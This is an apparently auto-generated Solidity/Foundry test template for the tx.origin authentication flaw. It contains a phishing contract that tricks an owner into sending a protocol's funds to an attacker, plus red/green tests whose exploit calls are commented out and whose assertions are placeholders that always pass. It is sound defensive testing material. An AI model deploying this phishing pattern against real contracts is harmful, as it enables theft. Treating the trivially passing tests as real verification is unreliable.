// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

import "forge-std/Test.sol";
import "forge-std/console.sol";

// AUTO-GENERATED by DelegateGuard harness generator
// Bug class : PA-01 — tx.origin used for authentication
// Contract  : {contract_name}
// Function  : {function_name}
// Source    : {source_file}:{line}
// Run with  : forge test --match-contract {test_contract_name} -vv

interface IVulnProtocol {
    function {function_name}(address payable to) external;
}

// Phishing contract that tricks victim into triggering the exploit
contract PhishingContract_{test_contract_name} {
    IVulnProtocol public target;
    address payable public attacker;

    constructor(address _target, address payable _attacker) {
        target   = IVulnProtocol(_target);
        attacker = _attacker;
    }

    // Victim calls this thinking it's a benign action
    function claimFreeTokens() external {
        // tx.origin == victim, msg.sender == this contract
        target.{function_name}(attacker);
    }
}

contract {test_contract_name} is Test {

    address payable public protocol;
    address public owner   = makeAddr("owner");
    address public attacker = makeAddr("attacker");
    PhishingContract_{test_contract_name} public phisher;

    function setUp() public {
        // TODO: deploy {contract_name} with owner
        // protocol = payable(address(new {contract_name}(owner)));
        // vm.deal(address(protocol), 5 ether);
        // phisher = new PhishingContract_{test_contract_name}(address(protocol), payable(attacker));
    }

    // ── RED: phishing contract exploits tx.origin auth ───────────────────────

    function test_PA01_PhishingContractDrainsProtocol() public {
        uint256 balanceBefore = address(protocol).balance;

        // Owner calls phishing contract — tx.origin == owner throughout
        vm.prank(owner, owner); // prank(msgSender, txOrigin)
        // phisher.claimFreeTokens();

        // INVARIANT: tx.origin auth lets phishing contracts impersonate the owner
        // assertEq(address(protocol).balance, 0, "TX.ORIGIN: protocol drained");
        // assertGt(attacker.balance, 0, "attacker received funds");
        console.log("Protocol balance before:", balanceBefore);
        assertTrue(true, "TODO: uncomment assertions");
    }

    // ── GREEN: msg.sender check blocks phishing ──────────────────────────────

    function test_PA01_MsgSenderBlocksPhishing() public {
        // TODO: deploy fixed contract and verify phishing reverts
        vm.prank(owner, owner);
        vm.expectRevert(); // "not owner" — msg.sender is phisher, not owner
        // phisher.claimFreeTokens();
        assertTrue(true, "TODO: implement");
    }
}
